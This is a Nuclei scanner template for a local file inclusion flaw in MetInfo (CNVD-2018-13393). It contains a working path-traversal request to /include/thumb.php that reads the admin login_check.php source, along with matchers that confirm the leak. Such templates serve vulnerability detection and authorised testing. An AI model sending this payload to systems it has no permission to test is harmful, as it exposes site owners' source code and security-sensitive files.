id: CNVD-2018-13393

info:
  name: Metinfo - Local File Inclusion
  author: ritikchaddha
  severity: high
  description: Metinfo is susceptible to local file inclusion.
  reference:
    - https://paper.seebug.org/676/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: MetInfo

http:
  - method: GET
    path:
      - '{{BaseURL}}/include/thumb.php?dir=http\..\admin\login\login_check.php'

    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<?php"
          - "login_met_cookie($metinfo_admin_name);"
        condition: and

# digest: 4b0a00483046022100d93bb01defa683c44c084ad70b41b2a58596291e9193901b6f3a40b424d2eb41022100efd6e9b52905c62356c2cde1f691814d9dbada7387bceb14533a11220c27acf5:922c64590222798bb761d5b6d8e72950
